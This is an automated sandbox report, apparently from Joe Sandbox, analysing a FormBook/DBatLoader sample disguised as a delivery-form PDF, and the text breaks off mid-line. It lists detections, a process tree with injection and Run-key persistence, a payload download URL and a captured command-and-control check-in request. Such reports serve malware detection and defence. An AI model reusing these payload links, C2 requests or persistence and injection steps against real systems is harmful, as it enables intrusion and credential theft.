Windows Analysis Report
Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe

Overview

General Information

Sample name: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
Analysis ID: 1580843
MD5: 9e67c73f86b034d009280ab03db20124
SHA1: aba6a0de8e85cf5a84c0a158d3908189ecf29330
SHA256: b55cf6b5ec66fdc4dbbecc4e2f7698549964ec234bd0b55d057527d59d91147d
Tags: exe, user-TeamDreier

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Process Tree

  • System is w10x64
  • Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 7032 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 7124 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • IzFuULsBXSkS.exe (PID: 5016 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 4084 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
          • IzFuULsBXSkS.exe (PID: 5684 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7128 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • Lwnkboxd.PIF (PID: 3808 cmdline: "C:\Users\Public\Libraries\Lwnkboxd.PIF" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 7144 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • IzFuULsBXSkS.exe (PID: 5572 cmdline: "C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 1904 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
  • Lwnkboxd.PIF (PID: 4476 cmdline: "C:\Users\Public\Libraries\Lwnkboxd.PIF" MD5: 9E67C73F86B034D009280AB03DB20124)
    • cmd.exe (PID: 4348 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dxobknwL.pif (PID: 4124 cmdline: C:\Users\Public\Libraries\dxobknwL.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Configuration (DBatLoader)

{"Download Url": ["https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy"]}
Yara matches (memory dumps)

Source | Rule | Description | Author
00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(5 of 12 entries shown)

Yara matches (unpacked PE files)

Source | Rule | Description | Author
14.2.dxobknwL.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.dxobknwL.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
8.2.dxobknwL.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
8.2.dxobknwL.pif.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(5 of 6 entries shown)

                      System Summary

                      Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dxobknwL.pif, NewProcessName: C:\Users\Public\Libraries\dxobknwL.pif, OriginalFileName: C:\Users\Public\Libraries\dxobknwL.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ParentProcessId: 6600, ParentProcessName: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\dxobknwL.pif, ProcessId: 7124, ProcessName: dxobknwL.pif
                      Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Lwnkboxd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lwnkboxd
                      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Lwnkboxd.PIF" , ParentImage: C:\Users\Public\Libraries\Lwnkboxd.PIF, ParentProcessId: 3808, ParentProcessName: Lwnkboxd.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 6112, ProcessName: cmd.exe
                      Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Lwnkboxd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessId: 6600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lwnkboxd
                      Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine: C:\Users\Public\Libraries\dxobknwL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\dxobknwL.pif, NewProcessName: C:\Users\Public\Libraries\dxobknwL.pif, OriginalFileName: C:\Users\Public\Libraries\dxobknwL.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ParentProcessId: 6600, ParentProcessName: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\dxobknwL.pif, ProcessId: 7124, ProcessName: dxobknwL.pif
                      Suricata IDS alerts:

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-12-26T11:52:01.872987+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 172.217.19.238 | 443 | TCP
                      2024-12-26T11:52:04.721007+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 142.250.181.97 | 443 | TCP
                      2024-12-26T11:53:08.269717+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 199.59.243.227 | 80 | TCP
                      2024-12-26T11:53:08.269717+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 199.59.243.227 | 80 | TCP

                      AV Detection

                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy"]}
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIF; ReversingLabs: Detection: 63%
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Virustotal: Detection: 33%
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; ReversingLabs: Detection: 63%
                      Source: Yara match; File source: 14.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.dxobknwL.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 14.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 3.2.dxobknwL.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000008.00000002.2284510742.0000000032130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000010.00000002.2455762995.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000011.00000002.2916436350.0000000005890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.2264670714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.2229871914.000000002AE60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000012.00000002.2271670013.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000E.00000002.2236634830.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.2284786818.0000000034AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.2212491351.0000000029F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000013.00000002.2916624441.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000F.00000002.2916429816.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000010.00000002.2455645977.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknown; HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IzFuULsBXSkS.exe, 0000000F.00000000.2070567197.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915198433.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282039562.000000000065E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: dxobknwL.pif, 00000003.00000002.2212688667.000000002A1AE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2016612330.0000000029E60000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2004506026.0000000029CB2000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: dxobknwL.pif, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000601000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.000000000093A000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.0000000000911000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_029358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029358B4

                      Networking

                      Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49756 -> 199.59.243.227:80
                      Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49756 -> 199.59.243.227:80
                      Source: Malware configuration extractor; URLs: https://drive.google.com/uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe; Code function: 0_2_0294E2F8 InternetCheckConnectionA,0_2_0294E2F8
                      Source: Joe Sandbox View; IP Address: 199.59.243.227
                      Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.181.97:443
                      Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.217.19.238:443
                      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
                      Source: global traffic; HTTP traffic detected:
                          GET /uc?export=download&id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: drive.google.com
                      Source: global traffic; HTTP traffic detected:
                          GET /download?id=1ul9txWJp59nycLYoSYLD-WGxZxIuFZQy&export=download HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: drive.usercontent.google.com
                      Source: global traffic; HTTP traffic detected:
                          GET /7l3h/?64S=LVahBLZpOHw0&ltuttt-X=6zLgQVJeSE3kO4Sf+RLctODToVrPhYaQ0c4BWNSIp+OQ9yx8H1ct7jyxXPxozjpZEa0Pz8J6l7jjf+e1lE7ZvAiUMQsmdIIWqY7TwFLSKhERhv9WS2Ztltg= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en;q=0.9
                          Host: www.bellhomehd.shop
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic; DNS traffic detected: DNS query: drive.google.com
                      Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global traffic; DNS traffic detected: DNS query: www.bellhomehd.shop
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 